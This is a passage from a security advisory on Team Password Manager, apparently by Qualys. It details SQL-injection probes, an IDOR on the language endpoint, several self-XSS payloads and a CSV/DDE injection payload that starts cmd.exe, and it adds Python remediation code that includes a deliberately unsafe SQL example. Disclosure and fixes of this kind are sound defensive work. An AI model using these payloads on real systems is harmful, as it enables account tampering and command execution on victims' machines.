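def api_hits_from_blocked_ips(text, blocked_ips, api_prefix=DEFAULT_API_PREFIX):
    """Return (ip, path, status) for every non-error API response served to a
    blocked address. Any entry here means the block is bypassable."""
    hits = []
    for rec in parse_access_log(text):
        if (rec["ip"] in blocked_ips
                and rec["path"].startswith(api_prefix)
                and rec["status"] < 400):
            hits.append((rec["ip"], rec["path"], rec["status"]))
    return hits


def summarize_by_ip(text, api_prefix=DEFAULT_API_PREFIX):
    """Per address: (UI requests answered 403, API requests answered < 400).
    An address with both counts above zero is exactly the advisory's case."""
    summary = {}
    for rec in parse_access_log(text):
        denied, allowed = summary.get(rec["ip"], (0, 0))
        is_api = rec["path"].startswith(api_prefix)
        if not is_api and rec["status"] == 403:
            denied += 1
        elif is_api and rec["status"] < 400:
            allowed += 1
        summary[rec["ip"]] = (denied, allowed)
    return summary


if __name__ == "__main__":
    for hit in api_hits_from_blocked_ips(SAMPLE_LOG, {"192.168.0.7"}):
        print("blocked IP reached the API:", hit)
    print(summarize_by_ip(SAMPLE_LOG))
```

The durable fix is to enforce the block in front of the application, in the web server's access rules or a network ACL, so that every route including the API is covered; the application-level list then only serves as the source of addresses to push into that layer.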


Vulnerability #16: SQL Injection on Edit User page 


SQL injection was found on the Edit User page. Supplying a malformed group parameter (a group id followed by quote characters) in the request makes the application display an unhandled exception in the browser. The exception dump includes the full record of the user whose id is given in the user_id parameter, including that user's hashed password. Note that the response shown below is a PHP "Undefined index" notice raised in the users controller rather than a database error message; what the capture demonstrates is that the verbose error handler discloses the stored password hash to the requester. 


RISK FACTOR: Medium 


URL: http://<server ip>/<tpm path>/index.php/users/add_to_group/<user id> 


Parameter: group 
How to Reproduce: 


1. Go to the Users/Groups tab and open any user's data page. 

2. Click the "Add the User to a Group" button. 

3. Select the group to which the user should be added. 

4. Click "Save". 

5. In Burp, modify the group parameter as below: 

POST /tpm/index.php/users/add_to_group/23 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/users/add_to_group/23
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Cookie: PHPSESSID=4r50jvt00c8sddunqd0ckaki45; TPM_LANG=ffffffffff
Connection: close
Upgrade-Insecure-Requests: 1

csrft=7c3455dcec5d22cf6419fed05af9131aa8252430&user_id=24&group=18''


6. The response to the above request: 


There has been the following exception, please send it to Team Password Manager support (http://teampasswordmanager.com/support/):

ErrorException Object
(
    [message:protected] => Undefined index: 18''
    [string:Exception:private] =>
    [code:protected] => 8
    [file:protected] => /var/www/html/tpm/wmm/controllers/users.php
    [line:protected] => 1716
    [trace:Exception:private] => Array
        (
            [0] => Array
                (
                    [file] => /var/www/html/tpm/wmm/controllers/users.php
                    [line] => 1716
                    [function] => my_error_handler
                    [args] => Array
                        (
                            [0] => 8
                            [1] => Undefined index: 18''
                            [2] => /var/www/html/tpm/wmm/controllers/users.php
                            [3] => 1716
                            [4] => Array
                                (
                                    [id] => 24
                                    [data] => Array
                                        (
                                            [user_data] => Array
                                                (
                                                    [id] => 24
                                                    [username] => a
                                                    [email] => a@acd.com
                                                    [password] => %V4$2a$11$yt90f9EfXn6IxFm8T.Vn.etsq8tBJJKICwLCnUCo2ywx8KpEmZVnS
                                                    [name] => test
                                                    [...]
[name] => test 


Vulnerability #17: SQL Injection on Edit Group page 


SQL injection was found on the Edit Group page. Supplying a malformed user parameter (a user id followed by a quote character) in the request makes the application display an unhandled exception in the browser. As in the previous issue the response is a PHP "Undefined index" notice from the groups controller; the dump reveals the group record (id, name, creation and update timestamps) but no credential material, hence the lower rating. 


RISK FACTOR: Low 


URL: http://<server ip>/<tpm path>/index.php/groups/add_to_group/<group id> 


Parameter: user 
How to Reproduce: 


Go to User/Group tab and open any group data. 

Click on ‘Add the User to Group’ button. 

Select the user to be added in that group. 

Click on “Save” 

In Burp modify the user parameter like below: 

POST /tpm/index.php/groups/add_to_group/19 HTTP/1.1
Host: 192.168.250.81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.250.81/tpm/index.php/groups/add_to_group/19
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Cookie: PHPSESSID=72v159966170vdb4rh8me4clo3; TPM_LANG=ffffffffff
Connection: close
Upgrade-Insecure-Requests: 1

csrft=81930364cce3e9bb807b57f3f9cbb8eb76f2cd08&group_id=19&user=8'


6. Following is the response to the above request:

There has been the following exception, please send it to Team Password Manager support (http://teampasswordmanager.com/support/):
ErrorException Object
(
    [message:protected] => Undefined index: 8'
    [string:Exception:private] =>
    [code:protected] => 8
    [file:protected] => /var/www/html/tpm/wmm/controllers/groups.php
    [line:protected] => 496
    [trace:Exception:private] => Array
        (
            [0] => Array
                (
                    [file] => /var/www/html/tpm/wmm/controllers/groups.php
                    [line] => 496
                    [function] => my_error_handler
                    [args] => Array
                        (
                            [0] => 8
                            [1] => Undefined index: 8'
                            [2] => /var/www/html/tpm/wmm/controllers/groups.php
                            [3] => 496
                            [4] => Array
                                (
                                    [id] => 19
                                    [data] => Array
                                        (
                                            [group_data] => Array
                                                (
                                                    [id] => 19
                                                    [name] => "><img>''
                                                    [created_on] => 2018-03-07 17:36:07
                                                    [created_by] => 1
                                                    [updated_on] => 2018-03-07 20:08:21


Vulnerability #18: Privilege Escalation — Default Language

Any authenticated user can change the default language of the 'Admin' user; a read-only user can do this as well. The /user_info/clang endpoint trusts the user_id parameter supplied by the client instead of taking the acting user from the session, so it never checks that the caller is changing their own setting, and it does not validate the new_lang value against the installed languages.

RISK FACTOR: Low

URL: http://<server ip>/<tpm path>/index.php/user_info/clang

Parameters: user_id, new_lang

How to reproduce:

1. Log in to the application with any user other than an admin-role user (a read-only user can also change the default language).
2. Go to that user's settings page and click on the Change language button.
3. Change the user_id parameter to '1' (assuming the admin user always has user_id 1) and the new_lang parameter to any arbitrary value in the request, as shown below:

POST /tpm/index.php/user_info/clang HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /index.php/user_info/clang
Content-Type: application/x-www-form-urlencoded
Content-Length:
Cookie: PHPSESSID=Sw3mn3v437m80mkqs47081as82
Connection: close
Upgrade-Insecure-Requests: 1

csrft=<csrf token>&user_id=1&new_lang=AAAAAAAAAAA

4. The default language of the 'admin' user is now set to 'AAAAAAAAAAA', as shown on the admin user's settings page. The "Updated on ... By: ro" entry confirms that the change was made by the read-only user 'ro':

[Screenshot: admin user settings page (Data / Log / API Keys tabs)]
Username: admin
Name: admin
Role: Admin
Language: AAAAAAAAAA - (No description)
Groups:
Last Signed in: Mar 5, 2018 16:23
Created on: Feb 27, 2018 08:31  By: admin
Last API request: -
Updated on: Mar 5, 2018 16:23  By: ro


Vulnerability #19: Self Reflected Cross-site Scripting — Password Tag

Self-reflected Cross-site Scripting vulnerability found in the Tag field of the New Password / Edit Password form: the tag value is rendered back into the page without output encoding as soon as it is entered. The payload runs only in the browser of the user who types it.

RISK FACTOR: Low

How to Reproduce:

1. Click on "New Password".
2. Select the parent project.
3. Add the following in the Tag field: "> <script>alert('xss') </script>,
4. An alert box with the text 'xss' is shown.


Vulnerability #20: Self Reflected Cross-site Scripting — Project Tag

Self-reflected Cross-site Scripting vulnerability found in the Tag field of the New Project / Edit Project form. A user can create or modify a project.

RISK FACTOR:

How to Reproduce:

1. Click on "New Project".
2. Add the following in the Tag field:
3. An alert box is shown.


Vulnerability #21: Self Reflected Cross-site Scripting — My Password Tag

Self-reflected Cross-site Scripting vulnerability found in the Tag field of the "My Passwords" New Password form. A user can create or modify a personal password.

RISK FACTOR: Low

How to Reproduce:

1. Click on "My Passwords".
2. Click on "New Password".
3. Add the following in the Tag field: "> <script>alert('xss') </script>,
4. An alert box with the text 'xss' is shown.
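The three tag-field issues (#19, #20 and #21) share one root cause: the comma-separated tags field is split client-side and echoed back without validation or output encoding. The following Python block is an added example, not Team Password Manager code, showing the two server-side controls that close this class of bug: validate each tag against an allowlist on input, and HTML-encode every tag on output regardless of what validation did. The names parse_tags, render_tags and TAG_RE and the sample payloads are this example's own.

```python
# Added example; this is not Team Password Manager code.
import html
import re

# One tag: letters, digits, space, dot, underscore, hyphen; 1-50 characters.
# Anything that could open an HTML tag or attribute is rejected up front.
TAG_RE = re.compile(r"[A-Za-z0-9 ._-]{1,50}")


def parse_tags(raw):
    """Split the 'tags' form field as the UI does (on commas), normalise
    whitespace, drop empty and duplicate entries, reject invalid tags."""
    tags = []
    seen = set()
    for part in raw.split(","):
        tag = " ".join(part.split())          # trim and collapse whitespace
        if not tag:
            continue
        if not TAG_RE.fullmatch(tag):
            raise ValueError(f"invalid tag: {tag!r}")
        key = tag.lower()
        if key not in seen:
            seen.add(key)
            tags.append(tag)
    return tags


def render_tags(tags):
    """Render tags into HTML. Encoding is applied independently of the input
    validation above, so a tag that was stored before validation existed
    still cannot break out of the element."""
    return "".join(
        f'<span class="tag">{html.escape(tag, quote=True)}</span>' for tag in tags
    )


if __name__ == "__main__":
    print(parse_tags("web, prod ,Web"))
    print(render_tags(['"> <script>alert(\'xss\') </script>']))
    try:
        parse_tags('"> <script>alert(\'xss\') </script>, prod')
    except ValueError as err:
        print("rejected:", err)
```

The validation step gives a clean error to the user instead of silently storing a mangled tag; the encoding step is the one that actually prevents script execution, which is why it is not skipped for "already validated" data.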


Vulnerability #22: Insecure Session Handling

An already established session stays valid after the conditions under which it was granted have changed, until the user logs out. The application keeps accepting the session in the following two conditions:

1. If the session is accessed from an IP address that has since been blocked.
2. If the logged-in user's access has been changed to API only.

In both cases the check is applied only at login time and is not re-evaluated on subsequent requests, and the administrative action does not revoke existing sessions.

RISK FACTOR: Low

How to Reproduce:

Session is accessible from a blocked IP:

1. Log in to the application with any user from one browser.
2. Log in to the application as 'admin' from a different machine.
3. Go to the 'IP Address Blocking' page in the 'Settings' tab.
4. Click on the 'New IP Block' button.
5. Add the IP of the machine from which the user in step 1 is logged in.
6. The session established in step 1 remains usable until that user logs out.

Session is accessible to an API-only user:

1. Log in to the application with any user from one browser.
2. Log in to the application as 'admin' from a different machine.
3. Go to the 'Users/Groups' tab.
4. Open the settings page of the user who logged in in step 1.
5. Click on the 'Set as API only User' button.
6. The session established in step 1 remains usable until that user logs out.
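The following Python block is an added example, not Team Password Manager code. It models, with an in-memory user table, IP block list and session store that are all assumptions of the example, how the server should behave for #22 and #18 together: every request re-resolves the session and re-applies the IP-block and API-only checks, the two administrative actions revoke affected sessions immediately, and the "change language" handler takes the acting user from the session and never from a user_id form parameter. The language allowlist ALLOWED_LANGS is likewise hypothetical.

```python
# Added example; this is not Team Password Manager code.
import ipaddress
import secrets


class Forbidden(Exception):
    """The application would answer 403 and clear the session cookie."""


# Hypothetical data; in the real application these live in the database.
USERS = {
    1: {"username": "admin", "role": "admin", "api_only": False, "lang": "en"},
    2: {"username": "ro", "role": "read_only", "api_only": False, "lang": "en"},
}
ALLOWED_LANGS = {"en", "es", "de", "fr"}   # installed language packs (assumed)
BLOCKED_NETS = []                           # ipaddress networks added by admins
SESSIONS = {}                               # session id -> {"user_id", "ip"}


def current_user(sid, request_ip):
    """Resolve a session id to (user_id, user record), applying on every
    request the checks the vulnerable application applied only at login.
    A session that fails a check is destroyed, not merely refused."""
    sess = SESSIONS.get(sid)
    if sess is None:
        raise Forbidden("no such session")
    addr = ipaddress.ip_address(request_ip)
    if any(addr in net for net in BLOCKED_NETS):
        del SESSIONS[sid]
        raise Forbidden("request from blocked IP")
    user = USERS.get(sess["user_id"])
    if user is None or user["api_only"]:
        del SESSIONS[sid]
        raise Forbidden("user may not use the web interface")
    return sess["user_id"], user


def login(user_id, ip):
    """Create a session after authentication; the same checks as any other
    request are applied before the session id is handed out."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user_id": user_id, "ip": ip}
    current_user(sid, ip)
    return sid


def block_ip(cidr):
    """Admin action 'New IP Block': record the block and revoke every
    session that was established from that range."""
    net = ipaddress.ip_network(cidr, strict=False)
    BLOCKED_NETS.append(net)
    for sid, sess in list(SESSIONS.items()):
        if ipaddress.ip_address(sess["ip"]) in net:
            del SESSIONS[sid]


def set_api_only(user_id):
    """Admin action 'Set as API only User': flag the user and revoke all of
    that user's interactive sessions."""
    USERS[user_id]["api_only"] = True
    for sid, sess in list(SESSIONS.items()):
        if sess["user_id"] == user_id:
            del SESSIONS[sid]


def change_language(sid, request_ip, form):
    """Handler for /user_info/clang. Any user_id in the form is ignored: the
    only user whose setting can change is the one owning the session, and
    the new language must be one that is actually installed."""
    uid, _ = current_user(sid, request_ip)
    lang = form.get("new_lang", "")
    if lang not in ALLOWED_LANGS:
        raise ValueError("unknown language")
    USERS[uid]["lang"] = lang
    return uid
```

Revoking at the moment of the administrative change and re-checking on every request are deliberately both present: the first gives immediate effect, the second covers sessions the revocation loop could not see (for example blocks loaded from another node or a session moved to a newly blocked address).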


Vulnerability #23: SQL Injection on Edit Group page

The application does not validate the group_id parameter before passing it to the backend database: a non-numeric value is accepted by the controller and reaches the UPDATE statement on the wmm_groups table.

The application is affected but the issue looks non-exploitable. The error returned (MySQL error 1292, a type-conversion error rather than a syntax error) shows that the value reaches the query as a quoted, escaped string literal which MySQL then fails to convert to a number for comparison with the integer id column. What is demonstrated is therefore missing type validation of group_id combined with a verbose database error page (disclosing the full query, table and column names, and server file paths), not a confirmed injection point. During our assessment this issue was not exploited.

RISK FACTOR: Low

How to Reproduce:

Note - Reproducible with TPM Free Version with PHP 5.6.34-1.

1. Open the Edit Group page of an existing group, here http://10.113.192.189/tpm/index.php/groups/edit/1 (group "user1group1").
2. Change the name, click Save, and in Burp append a single quote to the group_id parameter:

POST /tpm/index.php/groups/edit/1 HTTP/1.1
Host: 10.113.192.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.113.192.189/tpm/index.php/groups/edit/1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Cookie: PHPSESSID=jtna108jjrllrvmqac3stqh2p4
Connection: close
Upgrade-Insecure-Requests: 1

csrft=4f9d26cbf09a626e71e5e621381cd3080fe3f728&group_id=1'&name=user1group4

Response:

There has been the following exception, please send it to Team Password Manager support (http://teampasswordmanager.com/support/):
Exception Object
(
    [message:protected] => Truncated incorrect DOUBLE value: '1''
    [string:Exception:private] =>
    [code:protected] => 500
    [file:protected] => /var/www/html/tpm/wmm/core/MY_Exceptions.php
    [line:protected] => 77
    [trace:Exception:private] => Array
        (
            [0] => Array
                (
                    [file] => /var/www/html/tpm/system/database/DB_driver.php
                    [line] => 1197
                    [function] => show_error
                    [class] => MY_Exceptions
                    [type] => ->
                    [args] => Array
                        (
                            [0] => A Database Error Occurred
                            [1] => Array
                                (
                                    [0] => Error Number: 1292
                                    [1] => Truncated incorrect DOUBLE value: '1''
                                    [2] => UPDATE `wmm_groups` SET `name` = 'user1group4', `updated_by` = '1', `updated_on` = '2018-03-09 15:27:45' WHERE `id` = '1\''
                                    [3] => Filename: /var/www/html/tpm/models/m_grp.php
                                    [4] => Line Number: 107
                                )
                            [2] => error_db
                        )
                )
            [1] => Array
                (
                    [file] => /var/www/html/tpm/system/database/DB_driver.php
                    [lin
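The three "single quote in an id parameter" findings (#16, #17 and #23) are all fixed the same way: validate every id coming from the request as a plain positive integer before any model code sees it, and keep the query parameterised so that the database never interprets user input as SQL. The following Python block is an added example, not Team Password Manager code; an sqlite3 in-memory table stands in for the MySQL wmm_groups table, the handler names are the example's own, and unsafe_rename() is the string-concatenation anti-pattern included only to show what a real injection through that parameter would look like.

```python
# Added example; this is not Team Password Manager code.
import re
import sqlite3

# A positive decimal integer: no sign, no whitespace, no quote, at most 10 digits.
_ID_RE = re.compile(r"[1-9][0-9]{0,9}")


class BadRequest(ValueError):
    """The application would answer HTTP 400 instead of running a query."""


def require_int_id(params, name):
    """Return params[name] as an int. Values such as "18''", "8'" or "1'"
    fail closed here, before reaching the model layer or the database."""
    raw = params.get(name)
    if not isinstance(raw, str) or not _ID_RE.fullmatch(raw):
        raise BadRequest(f"invalid {name}")
    return int(raw)


def make_db():
    """Stand-in for the MySQL schema, with two constructed groups."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wmm_groups (id INTEGER PRIMARY KEY, name TEXT NOT NULL, updated_by INTEGER)"
    )
    conn.executemany(
        "INSERT INTO wmm_groups VALUES (?, ?, ?)",
        [(1, "user1group1", 1), (19, "team", 1)],
    )
    conn.commit()
    return conn


def rename_group(conn, params, actor_id):
    """Edit Group handler: validated id, bounded name, parameterised UPDATE.
    Returns the number of rows changed (0 means no such group)."""
    group_id = require_int_id(params, "group_id")
    name = params.get("name", "").strip()
    if not 1 <= len(name) <= 100:
        raise BadRequest("invalid name")
    cur = conn.execute(
        "UPDATE wmm_groups SET name = ?, updated_by = ? WHERE id = ?",
        (name, actor_id, group_id),
    )
    conn.commit()
    return cur.rowcount


def unsafe_rename(conn, params, actor_id):
    """Anti-pattern, for contrast only: the id is spliced into the SQL text,
    so group_id = "1' OR '1'='1" rewrites every row in the table."""
    sql = "UPDATE wmm_groups SET name = '%s', updated_by = %d WHERE id = '%s'" % (
        params.get("name", ""), actor_id, params.get("group_id", ""))
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def group_name(conn, group_id):
    row = conn.execute(
        "SELECT name FROM wmm_groups WHERE id = ?", (group_id,)
    ).fetchone()
    return row[0] if row else None
```

Rejecting the value at the controller also removes the verbose error page from the equation: a 400 response carries none of the query text, file paths or record data that the exception handler printed in the findings above.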


Vulnerability #24: Insecure Password Link Sharing

The External Password Sharing feature is implemented insecurely. The following controls are missing:

1. The external sharing link stays the same after the password is changed, so anyone holding the old link also sees the new value.
2. External sharing links have no expiry.

RISK FACTOR: Low

How to Reproduce:

External Password link remains the same after changing the password:

1. Go to a password in any project.
2. Enable the 'External Sharing' feature. This generates a URL that can be used by anyone who can reach the application.
3. Now change the password.
4. Access the link from step 2: it shows the changed password.

When a password is changed, the existing sharing link should be revoked and, if sharing is still wanted, a new link generated; links should also carry an expiry time.
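One way to get both missing controls from #24 without keeping a table of issued links is to make the link token itself state which password version and which deadline it is good for, and to bind those fields with an HMAC under a server-side key. The following Python block is an added example, not Team Password Manager code: the key, the record store with its per-password version counter, and the function names are the example's assumptions.

```python
# Added example; this is not Team Password Manager code.
import base64
import binascii
import hashlib
import hmac
import struct
import time

SERVER_KEY = b"replace-with-a-random-key-from-server-config"   # assumed secret
_HEADER = struct.Struct(">QQQ")            # password_id, version, expires_at
_MAC_LEN = hashlib.sha256().digest_size


def _mac(password_id, version, expires_at):
    return hmac.new(SERVER_KEY, _HEADER.pack(password_id, version, expires_at),
                    hashlib.sha256).digest()


def make_share_token(password_id, version, ttl_seconds, now=None):
    """Issue a link token for the current version of a password."""
    now = int(time.time() if now is None else now)
    expires_at = now + ttl_seconds
    raw = _HEADER.pack(password_id, version, expires_at) + _mac(password_id, version, expires_at)
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def resolve_share_token(token, records, now=None):
    """Return the shared secret, or None if the token is malformed, forged,
    expired, or refers to a password version that has since been replaced.
    `records` maps password id -> {"version": int, "secret": str}."""
    try:
        raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
    except (ValueError, binascii.Error):
        return None
    if len(raw) != _HEADER.size + _MAC_LEN:
        return None
    password_id, version, expires_at = _HEADER.unpack(raw[:_HEADER.size])
    if not hmac.compare_digest(raw[_HEADER.size:], _mac(password_id, version, expires_at)):
        return None
    now = int(time.time() if now is None else now)
    if now >= expires_at:
        return None
    rec = records.get(password_id)
    if rec is None or rec["version"] != version:
        return None
    return rec["secret"]


def rotate_password(records, password_id, new_secret):
    """Changing a password bumps its version, which invalidates every link
    issued for the old value without any per-link bookkeeping."""
    rec = records[password_id]
    rec["version"] += 1
    rec["secret"] = new_secret
    return rec["version"]
```

The version check is what ties the link to the value the owner actually decided to share; the expiry bounds how long a leaked link is useful. Explicit revocation ("disable external sharing" before either has happened) still needs a server-side flag on the record, which this example does not model.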


Vulnerability #25: Self Reflected Error based Cross-site Scripting

The custom field label is vulnerable to cross-site scripting: when a value entered into a custom field fails validation, the field's label is reflected into the error message without output encoding.

RISK FACTOR:

How to Reproduce:

1. Go to a project and click C.F. Template.
2. Add a custom field label containing the payload.
3. Select Type as email and save it.
4. Click New Password.
5. Enter any invalid email address in the custom email field and click on Save.

[Screenshot: alert box showing the injected label "Email_field"]


Vulnerability #26: Self Reflected Cross-site Scripting - Search Box

The search box of the custom field templates list is vulnerable to self-only cross-site scripting.

URL: http://192.168.249.107/tpm/index.php/settings/cft_list

Parameter: search_box

RISK FACTOR: Low

How to Reproduce:

1. Open http://192.168.249.107/tpm/index.php/settings/cft_list (search templates).
2. Add the payload in the search box - "><img src=xx onerror=alert(2)>

[Screenshot: alert box on http://192.168.249.107/tpm/index.php/settings/cft_list]


Vulnerability #27: Self Reflected Cross-site Scripting - IP Address Blocking Configuration

The search boxes of the IP Address Blocking pages (the IP block list and the manual and automatic IP filter lists) are vulnerable to self-reflected cross-site scripting.

URL: http://192.168.249.107/tpm/index.php/settings/ipb_list

Parameter: search_box

RISK FACTOR: Low

How to Reproduce:

1. Open the above URL in a browser.
2. Add the respective payload in each search box:
"><img src=xx onerror=alert("ip_filter_manual")>
"><img src=xx onerror=alert("ip_filter_automatic")>
"><img src=xx onerror=alert("ipb_list")>

[Screenshots: alert boxes "ipb_list", "ip_filter_manual" and "ip_filter_automatic" on http://192.168.249.107/tpm/index.php/settings/ipb_list]


Vulnerability #28: Self Reflected Cross-site Scripting - Log Filter

The log filter fields are vulnerable to self-only cross-site scripting.

URL: http://192.168.249.107/tpm/index.php/alog

Parameters: password, project, ip_address, additional

RISK FACTOR: Low

How to Reproduce:

1. Open the filter box on http://192.168.249.107/tpm/index.php/alog
2. Add the payload in each of the above fields - "><img src=xx onerror=alert(111)>

[Screenshots: alert boxes on http://192.168.249.107/tpm/index.php/alog for each filter field, including the additional data field]


Vulnerability #29: Self Reflected Cross-site Scripting - User Search Box

The user search box is vulnerable to self-only cross-site scripting.

URL: http://192.168.250.81/tpm/index.php/users

Parameter: search_box

RISK FACTOR: Low

How to Reproduce:

1. Open http://192.168.249.107/tpm/index.php/users (search box).
2. Add the payload in the search box - "><img src=xx onerror=alert("search_users")>

[Screenshot: alert box "search_users" on http://192.168.249.107/tpm/index.php/users]


Vulnerability #30: Self Reflected Cross-site Scripting - Group Search Box

The group search box is vulnerable to self-only cross-site scripting.

URL: http://192.168.249.107/tpm/index.php/groups

Parameter: search_box

RISK FACTOR: Low

How to Reproduce:

1. Open http://192.168.249.107/tpm/index.php/groups (search groups).
2. Add the payload in the search box - "><img src=xx onerror=alert("search_group")>

[Screenshot: alert box "search_group" on http://192.168.249.107/tpm/index.php/groups]


Vulnerability #31: CSV Injection Vulnerability

The application provides functionality to export data in CSV format. The exported values are written to the CSV file without being sanitised, which leads to a CSV (formula) injection vulnerability.

An attacker who can create or edit a password can store a cell value that begins with a formula character (=, +, -, @). When another user exports the passwords and opens the file in a spreadsheet application, the spreadsheet evaluates the cell on that user's machine. With the DDE payload below, Excel asks the user to confirm updating external links and starting cmd.exe, so exploitation relies on the user accepting those prompts.

URL: http://192.168.249.107/tpm/index.php/settings/view/export_import

RISK FACTOR: Medium

How to Reproduce:

1. Go to any project.
2. Add a new password.
3. Add the following payload in any of the password fields (the Username field was used here):
   =cmd|' /C calc'!A0

[Screenshot: password "test" in project PMproject with Username set to =cmd|' /C calc'!A0]

4. Go to 'Settings'.
5. Click on the 'Export Passwords' button in 'Export / Import'.
6. Select the project in which the above password was added.
7. Export the passwords of that project.
8. Open the exported file in Excel: the payload is executed on the user's machine and opens Calculator, as shown in the screenshot.

[Screenshot: exported file pmproject-2018-03-10 open in Excel, with columns Project name, Name, Access info, Username, E-mail, Password, Notes, Tags, Custom fields, the formula bar showing =cmd|' /C calc'!A0, and the Windows Calculator window on top]
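The export side of the fix for #31 is to treat every cell as data: any value whose first non-blank character is one a spreadsheet interprets as the start of a formula or DDE call (=, +, -, @, tab, carriage return) is prefixed with a single quote so it is imported as text, and every cell is quoted. The following Python block is an added example, not Team Password Manager code; the column names follow the export shown in the screenshot, and the rows are constructed sample data for this example.

```python
# Added example; this is not Team Password Manager code.
import csv
import io

# Leading characters that Excel and LibreOffice treat as a formula or DDE call.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralise_cell(value):
    """Return `value` as a string that a spreadsheet will not evaluate.
    Leading whitespace is looked past so that " =cmd|..." is caught too."""
    text = "" if value is None else str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_passwords_csv(rows, columns):
    """Serialise password records to CSV with every cell neutralised and
    quoted. `rows` is a list of dicts; `columns` fixes the column order."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=columns, quoting=csv.QUOTE_ALL,
                            lineterminator="\n", extrasaction="ignore")
    writer.writeheader()
    for row in rows:
        writer.writerow({col: neutralise_cell(row.get(col)) for col in columns})
    return buf.getvalue()


def is_formula_safe(csv_text):
    """Re-parse an export and confirm that no cell still starts with a
    trigger character; intended as a regression test on the export path."""
    reader = csv.reader(io.StringIO(csv_text))
    return all(not cell.lstrip().startswith(FORMULA_TRIGGERS)
               for row in reader for cell in row)


COLUMNS = ["Project name", "Name", "Access info", "Username", "E-mail",
           "Password", "Notes", "Tags"]

# Constructed sample data, mirroring the advisory's payload in the Username field.
SAMPLE_ROWS = [
    {"Project name": "PMproject", "Name": "test", "Access info": "http://www.example.org",
     "Username": "=cmd|' /C calc'!A0", "E-mail": "test@example.org",
     "Password": "-hunter2", "Notes": "+1 (555) 0100", "Tags": "prod, web"},
    {"Project name": "PMproject", "Name": "aaaaa", "Access info": "",
     "Username": "bob", "E-mail": "", "Password": "Password: testst",
     "Notes": "@here", "Tags": ""},
]

if __name__ == "__main__":
    print(export_passwords_csv(SAMPLE_ROWS, COLUMNS))
```

The quote prefix is visible to anyone who reads the file, and for a password export that matters: a secret that legitimately begins with "-" or "+" is altered in the CSV. Either document the prefix in the export dialog or offer a format such as JSON for machine-to-machine transfer where no spreadsheet will ever evaluate the values.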


CREDITS: 


The discovery and documentation of these vulnerabilities was conducted by the Qualys Application
Security and Research Team (QUASAR).


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at
http://www.qualys.com or send email to quasar@qualys.com


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2018 Qualys Inc. It may 
be redistributed provided that no fee is charged for distribution and that the advisory is 
not modified in any way. 


